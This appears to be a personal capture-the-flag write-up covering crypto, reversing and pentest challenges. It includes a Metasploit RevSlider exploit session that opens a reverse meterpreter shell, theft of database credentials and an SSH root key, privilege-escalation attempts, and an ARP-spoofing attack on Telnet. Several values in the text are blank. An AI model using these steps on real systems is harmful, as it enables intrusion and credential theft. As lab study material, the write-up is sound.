* https://www.cs.drexel.edu/~jpopyack/IntroCS/HW/RSAWorksheet.html
* https://asecuritysite.com/Encryption/rsa?val=11%2C3%2C3%2C4

Other dig/helpers:
* https://www.dcode.fr/rsa-cipher
* http://www.math.com/students/calculators/source/prime-number.htm
* https://crypto.stackexchange.com/questions/10590/what-makes-rsa-secure-by-using-prime-numbers
* https://www.mtholyoke.edu/courses/quenell/s2003/ma139/js/powermod.html
* https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/#key-loading
* http://billatnapier.com/2011_tut_encryption.pdf
* https://gist.github.com/AArnott/c105f9a1c8ebf546a027
* https://www.calculator.net/big-number-calculator.html?cx=906851&cy=2531257&cp=20&co=pow

3) Smiley :)

This was an easy challenge but to me it was the hardest to solve as a number of diversion and misleading paths.

  • Challenge
  • Repeated Key XOR - Python
import base64

cipher_text = base64.b64decode(cipher_text)

key = ":)"*len(cipher_text)

print "".join([chr(ord(c1) ^ ord(c2)) for (c1,c2) in zip(cipher_text,key)])
  • Flag

  • What did not work?
* was diverted a lot with various hints in this challenge.
  - emoji tweets with the ciphertext
  - tried very much for a long time to discover smiley cipher
    - detour at codeEmoji
    - some detour at using emoji characters for encryption
    - the website that claims for smiley cipher --> enisoc.com/smileycipher was taken down --> 
so looked into the archives in google to find the code possibly --> found that the key was just repeating xor with smileys
    - Also, ended up at different articles of xor encryption being broken with smiley pictures.
  - After a long search knew that the given string was cipher text and smiley was the key. Repeating exor solved it...
* https://ayende.com/blog/177729/emoji-encoding-a-new-style-for-binary-encoding-for-the-web
* https://gist.github.com/ayende/c7977cda3fe64c1399fea80837c9904e
* https://stackoverflow.com/questions/31280295/python-reading-emoji-unicode-characters
* https://cryptii.com/pipes/morse-code-with-emojis
* http://decodemoji.com/
* https://codemoji.org/#/encrypt
* https://www.dcode.fr/
   - Went through all the different ciphers, crypto and symbols (was helpful in getting know different ciphers though)

Lesson: Revert back and rethink every now and then before insanely digging...


1) Cheesy

  • Challenge

  • Steps to Flag - Used Strings and Base64 decode
root@kali:~/Downloads# file reversing1 
reversing1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a0d672b744b45bdc3f634cf144d1ae3f2a0f4509, not stripped
root@kali:~/Downloads# strings reversing1 
Hello! I bet you are looking for the flag..
I really like basic encoding.. can you tell what kind I used??
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
root@kali:~/Downloads# python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22) 
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> base64.b64decode("QUFBQUFBQUFBQUFBQUFBQQ==")
>>> base64.b64decode("RkxBR2ZsYWdGTEFHZmxhZ0ZMQUdmbGFn")
>>> base64.b64decode("Q2FuIHlvdSByZWNvZ25pemUgYmFzZTY0Pz8=")
'Can you recognize base64??'
>>> base64.b64decode("Z2lnZW17M2E1eV9SM3YzcjUxTjYhfQ==")
  • Flag: gigem{3a5y_R3v3r51N6!}

2) Snakes Over Cheese

– wow this is python reversing

  • Challenge
  • Steps to the Flag
    • Download and Install: Used uncompyle2 project from Github to reverse the python binary .pyc to code.
root@kali:~/Desktop/pyReverse# git clone https://github.com/Mysterie/uncompyle2
Cloning into 'uncompyle2'...
remote: Enumerating objects: 329, done.
remote: Total 329 (delta 0), reused 0 (delta 0), pack-reused 329
Receiving objects: 100% (329/329), 478.81 KiB | 2.66 MiB/s, done.
Resolving deltas: 100% (176/176), done.
root@kali:~/Desktop/pyReverse# ls
root@kali:~/Desktop/pyReverse# cd uncompyle2/
root@kali:~/Desktop/pyReverse/uncompyle2# ls
compile_tests  PKG-INFO    scripts    setup.py  test_pythonlib.py
MANIFEST       README.rst  setup.cfg  test      uncompyle2

root@kali:~/Desktop/pyReverse/uncompyle2# python setup.py install
running install
running build
running install_scripts
copying build/scripts-2.7/uncompyle2 -> /usr/local/bin
changing mode of /usr/local/bin/uncompyle2 to 755
running install_egg_info
Writing /usr/local/lib/python2.7/dist-packages/uncompyle2-1.1.egg-info
  • Run uncompyle against the pyc file
root@kali:~/Desktop/pyReverse/uncompyle2# ./scripts/uncompyle2 ~/Downloads/reversing2.pyc 
# 2019.02.23 11:56:29 PST
# Embedded file name: reversing2.py
from datetime import datetime
Fqaa = [102,
XidT = [83,

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)

    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
        print datetime.now()

if __name__ == '__main__':
# okay decompyling /root/Downloads/reversing2.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2019.02.23 11:56:29 PST
  • Analyse Python Code: Edit the python file to print the Secret Key and Flag
root@kali:~/Downloads# cat reversing2.py
# 2019.02.23 11:57:43 PST
# Embedded file name: reversing2.py
from datetime import datetime
Fqaa = [102,
XidT = [83,

def main():
    print 'Clock.exe'
    input = raw_input('>: ').strip()
    kUIl = ''
    for i in XidT:
        kUIl += chr(i)
    print kUIl
    if input == kUIl:
        alYe = ''
        for i in Fqaa:
            alYe += chr(i)

        print alYe
        print datetime.now()

if __name__ == '__main__':
# okay decompyling /root/Downloads/reversing2.pyc 
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2019.02.23 11:57:43 PST
  • Run Code with Secret Key to get flag
root@kali:~/Downloads# python reversing2.py
>: 123
2019-02-23 11:58:44.911365
root@kali:~/Downloads# python reversing2.py
>: SuperSecretKey


1) Stop and Listen

Beginner pentest challenge.

  • Challenge

  • Start openVPN and listen to the traffic. Packets show the flag.

2) Wordpress

I liked this challenge a lot. Hacking by jumping across machines in the setup was very nice.!

  • Challenge

  • Reconnaissance and Network Scanning or Mapping

  • WordPress Scan using wpscan
    • Results show that the revSlider plugin is vulnerable
    • Enumerate username option reveals the admin
    • Bruteforcing for admin password did not work (with different wordlists! for admin)

  • Exploitation using Metasploit
    • Search for revslider plugin fetches the exploit
    • Use the exploit setting necessary options like the RHOST
    • Check if the target is vulnerable
    • Fire the exploit
    • Result: A meterpreter session (Shell) with www-data user is obtained
root@kali:~/Downloads# msfconsole
[-] No database definition for environment production
# cowsay++
< metasploit >
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.17.34-dev                         ]
+ -- --=[ 1845 exploits - 1045 auxiliary - 320 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 
msf > 
msf > search revslider

Matching Modules

   Name                                             Disclosure Date  Rank       Check  Description
   ----                                             ---------------  ----       -----  -----------
   exploit/unix/webapp/wp_revslider_upload_execute  2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability

msf > use exploit/unix/webapp/wp_revslider_upload_execute
msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST
msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit

[*] Started reverse TCP handler on 
[+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/QmcgmOG.php
[*] Calling payload...
[*] Sending stage (38247 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-03-01 13:19:30 -0800
[+] Deleted QmcgmOG.php
[+] Deleted ../revslider.zip

meterpreter > pwd
meterpreter > ls
No entries exist in /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
  • Spawn tty shell
meterpreter > shell
Process 52 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
  • Clearly the /root/flag.txt is under the control of root (www-data has no permission)

  • More Recon with the Machine

    • First interesting find is the wp-config (/var/www/) which contains the credentials of the database, using the credentials to login to mySQL and view the users table - admin password. (Here is the trick, the admin credentials need not be cracked, but I mistook and took a diversion to crack the admin password.)
  • Some more information.

  • Note file content

  • system info

  • shell to dig into the machine

  • Process Run by Root shows SSHD - < probably the key in the db server should help as per note.txt? >
      www-data@apacheword:/dev$ ps aux
    ps aux
    root         1  0.0  0.0  17984  2872 ?        Ss   20:54   0:00 /bin/bash /star
    root        26  0.0  0.0  61392  3124 ?        Ss   20:54   0:00 /usr/sbin/sshd
    root        38  0.0  0.1 310992 24652 ?        S    20:54   0:00 apache2 -D FORE
    www-data    40  0.0  0.3 317804 48108 ?        S    20:54   0:00 apache2 -D FORE
    www-data    41  0.0  0.2 317832 44120 ?        S    20:54   0:00 apache2 -D FORE
    www-data    42  0.0  0.0 312720 14740 ?        S    20:54   0:00 apache2 -D FORE
    www-data    43  0.0  0.0 311016  7760 ?        S    20:54   0:00 apache2 -D FORE
  • Hacking MySQL server to read the local files.

TIP! –> It is annoying to copy the key data with the table so I added this extra step to not print the table outline so it is helpful to copy the key

  • Generate public key, Use the private key to perform SSH authentication as root.
* Add passphrase and change permission of the private key file
root@kali:~/Downloads# chmod 600 theKey.key 
root@kali:~/Downloads# sudo ssh-keygen -p -f theKey.key 
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 

* Wondered if we needed the public key so generated but it should have already been added by root at the wordpress server. 
root@kali:~/Downloads# sudo ssh-keygen -y -f theKey.key > theKey.pub
Enter passphrase: 
  • Flag

  • What did not work????
  - [This step is not needed] Also the logic flow of the username/passwords are stored at --> ``, I took a detour to crack the admin password thinking it might help in privilege escalation but I was wrong. Even then, I cracked the admin password by analyzing the code and reversing the hash

* Attempting Post Exploitation
  - Obtaining the shell already, (even after looking at the note) I went crazy over some post exploitation technique.
  - Abuse kernel
    * Using kernel exploits which were unsure
  - Abuse SUID
    * Try to abuse permission in some manner ind / -xdev -perm 4000 -type f -print0 -exec ls -s {} \;
  - Abuse process migrate
    - with meterpreter migrate
  - Searching binary to exploit - searching for improper permission set in any binary.

* Attempting to hack into the mysql machine shell
  - Try to break the mysql shell with `!sh`
  - Try to run exploit. 
    - Found an exploit in mariaDB and mysql5.5 which I thought should work. Downloaded the exploit and tried exploiting but it did not work. I ended up knowing the mysql version was update to 5.6 and this was fixed...

[This step was not necessary for the challenge]

  • Hacking the Admin Account in Wordpress

3) Calculator

Old school man in the middle for Telnet.

  • Challenge

  • Scanning or Recon

  • Setup
    • Monitor the interface in promiscous or monitor mode to capture all the packets
    • To perform MTIM
      • Arp spoof both the machines
      • Ipv4 forward enable to route packets
  • Attack and Exploit - Using ArpSpoof in Kali

  • Notes with Alice Password. Use the intial control message exchange as delimiter.

  • Flag –> Hidden file in the directory...!

  • Reference:
  • What was not required?
    • Running network interfaces in promiscous mode I wondered if I could just spoof the telnet client by acting as the server and send a forged packet to get the password. This was not reliable but I just wondered initially…


  • Solved some challenges here –> assets will be updated soon


None yet, will update soon…